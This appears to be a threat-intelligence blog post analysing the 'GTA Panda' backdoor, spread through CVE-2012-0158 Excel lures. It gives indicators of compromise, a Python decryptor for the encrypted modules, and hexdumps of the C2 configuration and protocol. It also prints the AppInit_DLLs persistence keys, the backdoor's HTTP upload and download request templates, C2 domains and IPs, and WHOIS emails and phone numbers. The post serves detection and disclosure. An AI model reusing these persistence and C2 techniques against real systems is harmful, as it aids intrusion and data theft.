Grand Theft Auto Panda

After digging into some recent malicious XLS documents taking advantage of the tried and true CVE-2012-0158 exploit, I came upon some interesting malware, which appears to be actively targeting human rights activists and the automotive industry. Upon further inspection it appears that a number of recent domains and IP addresses are involved; however, at the time of this report only a few were active. In honor of our friends we decided to name this particular threat Grand Theft Auto (GTA) Panda, as they appear to be punching people in the face and stealing their cars. The malware used appears to extend as far back as early 2011 with earlier variants tracing back even further to 2010.

Technical Details

The XLS document was designed to lure victims in through a seemingly negative customer service review, which purported that the recipient had “Serious bad attitude to customers”.

Document Details:
MD5: CFC7254F36F9F0BD77B14218475E7112
File Size: 294,351Bytes

The document contained another encoded document within its body beginning at offset 0xBE00 as well as an encoded executable beginning at offset 0xF400. Both were encoded using the same scheme of a single-byte XOR against the byte 0x9C and a right rotational byte shift (ROR) of 3. The inner document is what would be shown to a potential victim upon successful exploitation and was saved as "%temp%\~tmp.xls" The outer document’s metadata was stripped from the file while the inner document contained the following metadata:

Inner Document Metadata:
Author: cool
Company: MC SYSTEM
Date Created: 5/29/2013 9:48AM
Date Last Saved: 5/29/2013 9:50AM

The dropper was actually a self-extracting 7zip archive, which contained two files that were responsible for the creation and installation of the backdoor and associated files.

SFX Dropper Details:
MD5: DD8499684DF9C314778E4DD858D049F5
File Size: 231,887 Bytes

Embedded 7zip Contents:
Filename: inst.exe
MD5: 0C856287C218C036B4EF08AD880EDEE9
File Size: 46,592 Bytes
Compile Time: 2/25/2013 9:03:04 UTC

Filename: sc.bin
MD5: 6B63CCEED30FED466E3FFA1D9E3D3D34
File Size: 190,775 Bytes

The “inst.exe” binary contained a debug path within the code “e:\SVN\Plat1\Release\Inst.pdb” which suggested it may be formally maintained in a standard SVN code repository. The file “sc.bin” contained shellcode as well as a larger DLL, which contained several additional PE files within a resource named “VERSION”. Interestingly, the DLL also contained the debug path “e:\SVN\Plat1\Release\Inst_dll.pdb”. The dropper, inst.exe, also had several routines to check for the presence of 22 popular Antivirus programs in the registry as well as specifically checking for the presence of a process named “zhudongfangyu.exe” which is part of the Chinese 360 Antivirus Suite. The “inst.exe” binary was designed solely to read in the contents of the file sc.bin in the same local path, allocate memory for it and copy the contents, and finally jump to the beginning of the shellcode. “sc.bin” contained the actual routines necessary to install and configure the backdoor appropriately.

Details of embedded DLL in sc.bin:
MD5: F9966C6AD4DC1A52811FAE63FD3ACA0D
File Size: 187,904 Bytes
Compile Time: 3/13/2013 6:26:42 UTC

File System Changes:

  • %temp%\~tmp.xls
  • %temp%\{Hex Character(s)}.tmp
  • %userprofile%\Documents\My Document\Dtl.dat
  • %userprofile%\Documents\My Document\glp.uin
  • %allusersprofile%\Application Data\Intel\Data\Dtl.dat (Network Config)
  • %allusersprofile%\Application Data\Intel\Data\glp.uin (General Config)
  • %allusersprofile%\Application Data\Intel\Sernem12.dll (Backdoor)
  • %allusersprofile%\Application Data\Intel\sig.dll
  • %allusersprofile%\Application Data\Intel\qjrr.dat (Encrypted DLL)
  • May Create %allusersprofile%\Application Data\Intel\qjss.dat
  • May Create %allusersprofile%\Application Data\Intel\Wincwq12.dat
  • May Create %allusersprofile%\Application Data\Intel\ittr.dat
  • May Create %allusersprofile%\Application Data\Intel\epcnge.dat
  • May Create Files in %allusersprofile%\Documents\My Document\utd_CE31\ with the extension .jpg or .bmp

Volatile Evidence:

  • %temp%\7ZipSfx.000\sc.bin (shellcode deleted)
  • %temp%\7ZipSfx.000\inst.exe (dropper deleted)
  • %allusersprofile%\Application Data\Intel\~1 (temp file)
  • Creates the mutex “Local\MU_ACBPIDS08”
  • Creates the mutex “Local\MU_ACB08”
  • Creates the mutex “Global\{A59CF429-D0DD-4207-88A1-04090680F714}”
  • May create the mutexes:
    • Global\{34748A26-4EAD-4331-B039-673612E8A5FC}
    • Global\{3C6FB3CA-69B1-454f-8B2F-BD157762810E}
    • Global\{43EE34A9-9063-4d2c-AACD-F5C62B849089}
    • Global\{A8859547-C62D-4e8b-A82D-BE1479C684C9}

Registry Changes:

  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs -> %allusersprofile%\Application Data\Intel\Sernem12.dll
  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs -> 1

Persistence Mechanism:

  • AppInit_DLLs Key in the HKLM Hive:
  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs which points to the loader %allusersprofile%\Application Data\Intel\Sernem12.dll

The backdoor established persistence via the DLL, “Sernem12.dll”, which was configured as an AppInit DLL on the system. In order to execute the backdoor immediately after exploitation, the attacker also included an export named “Run” which could be called from the command line via rundll32.exe. When the system is rebooted “Sernem12.dll” will subsequently be loaded into each application that is executed within the current logged on session. The debug path “E:\SVN\Plat1\Release\ResN.pdb” was left within the binary. Upon further inspection the DLL actually provided an extensible framework to load and execute additional encrypted modules; in this case “qjrr.dat” was a RC4 encrypted DLL which contained the backdoor functionality. It should be noted that multiple encrypted modules may be contained within the same local directory and loaded within the address space of Sernem12.dll.

00000000   72 58 96 74 39 37 39 31  32 36 00 00 00 00 00 00   rX–t979126......
00000010   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000020   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000030   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000040   00 00 00 00 00 04 01 00  E1 BB 96 9B AE 4E 3E A5   ........á»–›®N>¥

Figure 1: Header of Encrypted DAT File

The loader starts by checking that the first four bytes of the respective DAT file are “72 58 96 74” highlighted in green above. It then reads in the string that immediately follows the header up to 0x40 bytes and stores the value as the RC4 key, highlighted in grey in the figure above. The size of the encrypted data (0x10400 Bytes) is stored just before the start of the encrypted data at offset 0x44. The following python script can be used to decode these encrypted DAT files.

from Crypto.Cipher import ARC4
import sys,binascii,struct

with open(sys.argv[1], 'rb') as bin:
    binary = bin.read()

try:
    if binary[0:4] == binascii.unhexlify('72589674'):
        end = binary.find(binascii.unhexlify('00'))
        key = binary[4:end]
        size = struct.unpack("<I",binary[0x44:0x48])[0]
        encrypted_binary = binary[0x48:0x48+size]
        rc4 = ARC4.new(key)
        decrypted_binary = rc4.decrypt(encrypted_binary)
        if decrypted_binary:
            print 'Binary Successfully Decrypted: Wrote %s Bytes' % str(hex(size))
            open(sys.argv[1]+'.dec','wb').write(decrypted_binary)
    else:
        print 'Header Structure Invalid'
except:
    pass

Figure 2: Python Script to Decode Encrypted DAT Files

The decrypted “qjrr.dat” provided typical backdoor functionality and would allow the attacker to execute commands, enumerate system and drive information, manipulate processes, perform file management operations, and upload and download files. The backdoor contained a slightly different debug path from the previous binaries but the same drive letter, “E:\WORK\Project\T5000\Ver 1.51\Target\1.pdb”. The backdoor referenced two separate configuration files “.\Data\glp.uin” and “.\Data\Dtl.dat”. “glp.uin” was a generic unencrypted configuration file, which specified the encrypted plugins to load as well as document types of interest including .doc, .ppt, .xls, .docx, .xlsx, and .pptx. “Dtl.dat” contained the network configuration for the backdoor encoded with a single byte XOR against the byte 0x5F; the decoded network configuration block is shown in the figure below.

00000020   01 00 00 00 90 1F 00 00  00 00 00 00 74 73 72 76   ...........tsrv
00000030   61 6C 6C 2E 6D 69 63 72  6F 73 6F 66 74 2D 63 65   all.microsoft-ce
00000040   6E 74 72 65 2E 63 6F 6D  00 00 00 00 00 00 00 00   ntre.com........
00000050   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000060   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000070   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000080   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000A0   00 00 00 00 00 00 00 00  00 00 00 00 01 00 00 00   ................
000000B0   90 1F 00 00 00 00 00 00  74 73 72 76 61 6C 6C 30   .......tsrvall0
000000C0   31 2E 6E 6F 72 74 6F 6E  2D 75 70 64 61 74 65 2E   1.norton-update.
000000D0   63 6F 6D 00 00 00 00 00  00 00 00 00 00 00 00 00   com.............
000000E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000F0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000100   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000110   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000120   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000130   00 00 00 00 00 00 00 00

Figure 3: Decoded Network Configuration from "Dtl.dat"

Network Traffic Details and Detection

The backdoor may make DNS requests to "tsrvall.microsoft-centre.com" or "tsrvall01.norton-update.com". The backdoor will first attempt to connect to "tsrvall.microsoft-centre.com" on TCP port 8080 and if that fails it will attempt to communicate to tsrvall01.norton-update.com on TCP port 8080. Communication to these sites will be over TCP using either standard HTTP requests or a custom binary protocol.

00000000   65 75 65 75 1C 11 10 75  01 14 07 12 58 5F 6C 6D   eueu...u....X_lm
00000010   66 64 67 75 65 75 05 01  16 75 64 60 65 65 75 66   fdgueu...ud`eeuf
00000020   65 66 65 6D 67 62 6D 75  66 6C 6D 61 60 62 66 62   efemgbmuflma`bfb
00000030   64 67 58 5F 6C 6D 66 64  67 75 65 75 01 14 07 75   dgX_lmfdgueu...u
00000040   64 65 65 65 65 75 67 63  65 65 75 65 65 6F 64 16   deeeeugceeueeod.
00000050   6F 61 67 6F 65 66 6F 64  66 6F 63 64 75 62 60 60   oagoefodfocdub``
00000060   62 67 61 6C 65 58 5F 6C  6D 66 64 67 75 65 75 16   bgaleX_lmfdgueu.
00000070   1C 1B 75 64 65 66 66 75  03 32 17 1F 14 10 18 14   ..udeffu.2......
00000080   03 14 17 1F 14 10 65 14  19 04 17 18 14 13 04 14   ......e.........
00000090   75 36 32 17 64 14 12 61  14 0F 14 17 26 14 12 22   u62.d..a....&.."
000000A0   14 18 22 14 2C 14 16 61  14 0F 04 17 61 14 12 00   ..".,..a....a...
000000B0   14 75 04 04 17 3E 14 12  65 14 34 04 17 20 14 12   .u...>..e.4.. ..
000000C0   3E 14 36 22 17 65 14 1D  1C 14 0C 04 17 65 14 12   >.6".e.......e..
000000D0   6D 14 36 32 14 68 58 5F  6C 6D 66 64 67 75 65 75   m.62.hX_lmfdgueu
000000E0   05 19 1C 75 65 75 02 3C  3B 36 22 24 64 67 7B 31   ...ueu.<;6"$dg{1
000000F0   34 21 75 6D 75 65 75 65  75 7F 58 5F 6C 6D 66 64   4!umueueuX_lmfd
00000100   67 75 65 75 05 19 11 75  65 75 65 58 5F 6C 6D 66   gueu...ueueX_lmf
00000110   64 67 75 65 75 05 19 1C  75 64 75 24 3F 27 27 7B   dgueu...udu$?''{
00000120   31 34 21 75 64 6C 75 65  75 65 75 7F 58 5F 6C 6D   14!udlueueuX_lm
00000130   66 64 67 75 65 75 05 19  11 75 64 75 65 58 5F 6C   fdgueu...udueX_l
00000140   6D 66 64 67 75 65 75 05  19 1C 75 67 75 24 3F 26   mfdgueu...ugu$?&
00000150   26 7B 31 34 21 75 65 75  65 75 65 75 7F 58 5F 6C   &{14!ueueueuX_l
00000160   6D 66 64 67 75 65 75 05  19 11 75 67 75 64 60 67   mfdgueu...ugud`g
00000170   58 5F CD 55 55 55 B2 55  55 55 7D 55 55 55 75 55   X_ÍUUU²UUU}UUUuU
00000180   55 55 2D 28 F2 5C 54 55  55 55 55 55 75 56 1D 55   UU-(ò\TUUUUUuV.U
00000190   55 55 05 55 55 55 CD 28  F2 5C 93 0E 54 2D 6E 55   UU.UUUÍ(ò\“.T-nU
000001A0   B6 06 B1 1B 6E 55 05 55  34 55 26 55 26 55 22 55   ¶.±.nU.U4U&U&U"U
000001B0   3A 55 27 55 31 55 6E 55  55 55 7F 55 7B 55 31 55   :U'U1UnUUUU{U1U
000001C0   3A 55 36 55 6E 55 7F 55  7B 55 25 55 25 55 21 55   :U6UnUU{U%U%U!U
000001D0   6E 55 7F 55 7B 55 2D 55  39 55 26 55 6E 55 7F 55   nUU{U-U9U&UnUU
000001E0   7B 55 31 55 3A 55 36 55  2D 55 6E 55 7F 55 7B 55   {U1U:U6U-UnUU{U
000001F0   25 55 25 55 21 55 2D 55  6E 55 7F 55 7B 55 2D 55   %U%U!U-UnUU{U-U
00000200   39 55 26 55 2D 55 6E 55  55 55 6C 6D 66 64 67 75   9U&U-UnUUUlmfdgu
00000210   65 75 05 19 1C 75 66 75  3C 21 21 27 7B 31 34 21   eu...ufu<!!'{14!
00000220   75 65 75 65 75 65 75 30  2D 25 39 3A 27 30 27 7B   ueueueu0-%9:'0'{
00000230   30 2D 30 58 5F 6C 6D 66  64 67 75 65 75 05 19 11   0-0X_lmfdgueu...
00000240   75 66 75 64 65 67 58 5F  33 55 55 55 54 55 55 55   ufudegX_3UUUTUUU
00000250   54 55 55 55 55 55 75 56  05 55 55 55 7F 55 7B 55   TUUUUUuV.UUUU{U
00000260   31 55 3A 55 36 55 6E 55  7F 55 7B 55 25 55 25 55   1U:U6UnUU{U%U%U
00000270   21 55 6E 55 7F 55 7B 55  2D 55 39 55 26 55 6E 55   !UnUU{U-U9U&UnU
00000280   7F 55 7B 55 31 55 3A 55  36 55 2D 55 6E 55 7F 55   U{U1U:U6U-UnUU
00000290   7B 55 25 55 25 55 21 55  2D 55 6E 55 7F 55 7B 55   {U%U%U!U-UnUU{U
000002A0   2D 55 39 55 26 55 2D 55  6E 55 55 55 55 55 6C 6D   -U9U&U-UnUUUUUlm
000002B0   66 64 67 75 65 75 05 19  1C 75 61 75 30 25 36 3B   fdgueu...uau0%6;
000002C0   32 30 7B 31 34 21 75 65  75 65 75 65 75 30 2D 25   20{14!ueueueu0-%
000002D0   39 3A 27 30 27 7B 30 2D  30 58 5F 6C 6D 66 64 67   9:'0'{0-0X_lmfdg
000002E0   75 65 75 05 19 11 75 61  75 66 63 58 5F 71 55 55   ueu...uaufcX_qUU
000002F0   55 55 55 55 55 55 55 55  55 55 55 55 55 55 55 55   UUUUUUUUUUUUUUUU
00000300   55 55 55 55 55 55 55 55  55 55 55 55 55 55 55 55   UUUUUUUUUUUUUUUU
00000310   55 6C 6D 66 64 67 75 65  75 05 19 1C 75 65 58 5F   Ulmfdgueu...ueX_




Figure 4: Example of Custom Binary Protocol

The information is transmitted encoded using a single byte XOR against the byte 0x55.

0 0 IDE TARG
98312 0 PTC 1500 30308278 3984573712
98312 0 TAR 10000 2600 00:1C:42:03:13:61 75572490
98312 0 CIN 1033 VgBJAEMAVABJAE0ALQBMAFQA cgB1AG4AZABsAGwAMwAyAC4AZQB4AGUA QQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgA=
98312 0 PLI 0 Wincwq12.dat 8 0 0 *
98312 0 PLD 0 0
98312 0 PLI 1 qjrr.dat 19 0 0 *
98312 0 PLD 1 0
98312 0 PLI 2 qjss.dat 0 0 0 *
98312 0 PLD 2 152
---cut---

Figure 5: Partially Decoded TCP Packet

The contents of the current configuration file, "glp.uin", were also transmitted within the same session immediately following the information above. Several key pieces of information were transmitted in this first packet including the MAC address (green), a reversed decimal notation of the IP address (yellow), the system’s language identifier (blue), and a base64 encoded Unicode representation of the hostname, process the backdoor is executing within, and the username of the victim (grey). The base64 encoded string above decodes to "VICTIM-LT rundll32.exe Administrator". I didn’t delve too far into the command structure of the protocol itself but it appears to support up to 23 different commands which will perform a wide variety of common administrative tasks. File uploads and downloads appeared to use standard HTTP formatted requests similar to those in the figure below with a static User-Agent of "Mozilla/4.0 (compatible; MSIE 8.0; Win32)".

POST http://{hostname}:{port}/Service.asmx/%d HTTP/1.1
Accept: */*
Host: {hostname}:{port}
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Connection: Keep-Alive
Content-Type: Appplication/octet-stream
Content-Length: %d

GET http://{hostname}:{port}/images/%d.asmx?%s HTTP/1.1
Accept: */*
Host: {hostname}:{port}
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Connection: Keep-Alive

Figure 6: Example HTTP Requests to Upload and Download Files

One interesting thing to note is that the content type header in the figure above contains an extra “p” which can readily be used to identify this type of traffic.

C2 Infrastructure

I was able to determine several additional subdomains and domain names used by this particular threat group based upon IP telemetry and similar domain parking techniques. The actor typically set only the "www" subdomain to resolve to a legitimate Microsoft IP address so basic browser-based checking of the domain would appear benign.

Additional Active and Parked Subdomains:

{CENSORED}.norton-update.com    255.255.255.255
download.norton-update.com      64.62.184.144
{CENSORED}.norton-update.com    64.62.184.144
support.norton-update.com       64.62.184.144
tsrvall.norton-update.com       64.62.184.144

{CENSORED}.microsoft-centre.com 255.255.255.255
office.microsoft-centre.com     64.62.184.144
o.microsoft-centre.com          192.154.96.153
v.microsoft-centre.com          255.255.255.255
www.microsoft-centre.com        64.4.11.42

The two domains utilized in the sample above used distinct registrant information and email addresses for each domain. Both domains were registered earlier this year at different times which suggests a departure from earlier registration techniques.

WHOIS information:

Domain Name:                norton-update.com
Registration Date:          March 12, 2013
Registrant Contact:         mikemike
Email Address:              mike.mike4789@gmail.com
Address:                    L.A.
                            L.A.
                            Araucanía,432610
                            CL
Telephone:                  +56.03478673201

Domain Name:                microsoft-centre.com
Registration Date:          February 19, 2013
Registrant Contact:         wei zhang
Registrant Organization:    zhang wei
Email Address:              mmhl@263.com
Address:                    Qing Se Xiao Qu 5Dong 404
                            cheng du
                            SC
                            314455
                            CN
Telephone:                  14532151311

I also found several older domains, which were all registered with the email address "huamulan2011@yahoo.com" in October of 2012 and 2011. I’ve intentionally removed subdomains specific to victim organizations.

all.mssupports.com          64.62.184.144
ohare.mssupports.com        255.255.255.255
orlando.mssupports.com      0.0.0.0
srv01.mssupports.com        64.62.184.144
update.mssupports.com       0.0.0.0
www.mssupports.com          64.4.11.37

support.mcaupdate.com       64.62.184.144
www.mcaupdate.com           64.62.184.144

support.mseupdate.com       64.62.184.144
www.mseupdate.com           65.55.81.30